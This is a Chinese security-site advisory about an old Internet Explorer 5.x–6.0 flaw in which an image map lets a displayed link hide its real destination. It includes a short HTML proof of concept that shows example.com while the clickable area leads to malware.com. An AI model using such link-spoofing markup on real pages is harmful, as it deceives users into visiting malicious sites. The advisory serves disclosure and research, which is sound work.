您的位置:首页网络冲浪系统安全 → Microsoft Internet Explorer嵌入图象URI欺骗漏洞

Microsoft Internet Explorer嵌入图象URI欺骗漏洞

时间:2010/1/16 11:13:00来源:本站整理作者:我要评论(0)

Microsoft Internet Explorer嵌入图象URI欺骗漏洞:

涉及程序:
Microsoft Internet Explorer
 
描述:
Microsoft Internet Explorer嵌入图象URI欺骗漏洞
 
详细:
Microsoft Internet Explorer是一款流行的WEB浏览器。

Microsoft Internet Explorer在处理部分URI连接时存在问题,远程攻击者可以利用这个漏洞隐藏URI连接中的真实内容,诱骗用户访问恶意站点。

图象包含在正确格式的HREF标记中时,可隐藏URI连接中的真实内容,这个漏洞可诱骗用户访问一个非法连接而不被怀疑。

攻击者可以通过提供恶意图象使的显示的URI连接指向合法信任的站点,如果没有任何怀疑的用户把鼠标移到相关的链接,可能导致他们认为链接的是信任正确的站点而被欺骗。


受影响系统:
Microsoft Internet Explorer 6.0SP1
Microsoft Internet Explorer 5.5SP2
Microsoft Internet Explorer 5.5SP1
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 5.01
Microsoft Internet Explorer 5.0.1SP3
Microsoft Internet Explorer 5.0.1SP2
Microsoft Internet Explorer 5.0.1SP1
Microsoft Internet Explorer 5.0
Microsoft Internet Explorer 6.0
 - Microsoft Windows XP Professional
 - Microsoft Windows XP Home
 - Microsoft Windows NT 4.0 SP6a
 - Microsoft Windows ME
 - Microsoft Windows 98 SE
 - Microsoft Windows 98
 - Microsoft Windows 2000 Server SP2
 - Microsoft Windows 2000 Server SP1
 - Microsoft Windows 2000 Server
 - Microsoft Windows 2000 Professional SP2
 - Microsoft Windows 2000 Professional SP1
 - Microsoft Windows 2000 Professional
 - Microsoft Windows 2000 Datacenter Server SP2
 - Microsoft Windows 2000 Datacenter Server SP1
 - Microsoft Windows 2000 Datacenter Server
 - Microsoft Windows 2000 Advanced Server SP2
 - Microsoft Windows 2000 Advanced Server SP1
 - Microsoft Windows 2000 Advanced Server
 
攻击方法:
警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http-equiv@excite.com (http-equiv@excite.com)提供了如下测试方法:

<A HREF=http://www.example.com alt="http://www.example.com">
<IMG SRC="malware.gif" USEMAP="#malware" border=0
alt="http://www.example.com"></A>
<map NAME="malware" alt="http://www.example.com">
<area SHAPE=RECT COORDS="224,21" HREF="http://www.malware.com"
alt="http://www.example.com">
</MAP>
 

相关视频

    没有数据

相关阅读 微信支付漏洞会造成哪些影响 微信支付存在漏洞要怎么办海盗来了能量漏洞是什么 微信海盗来了能量漏洞介绍英特尔cpu漏洞怎么修复 intelcpu漏洞补丁英特尔处理器漏洞怎么回事 英特尔处理器漏洞是什么苹果电脑安全漏洞是什么 苹果电脑安全漏洞无需密码解锁解决办法零日漏洞是什么意思?零日漏洞的介绍及防御ios设备时间漏洞_修改时间为1970年1月1日之后iPhone变砖及附解决iOS8.4越狱被曝重大安全隐患 谨慎而行

文章评论
发表评论

热门文章 没有查询到任何记录。

最新文章 U盘传播的病毒 _ U盘病打开U盘才不会中毒的方 alg.exe是什么进程?能不能关闭?nsis error是什么?及解决方法蓝屏错误代码解析 看代码解决问题dotnetfx.exe是什么

人气排行 alg.exe是什么进程?能不能关闭?qq修复工具怎么用如何更改ie收藏夹地址位置(路径)无光驱,无U盘启动,怎样重装系统?nsis error是什么?及解决方法Generic Host Process for Win32 开机后总是六种修复崩溃后WindowsXP系统的技巧exp1orer.exe 病毒清除办法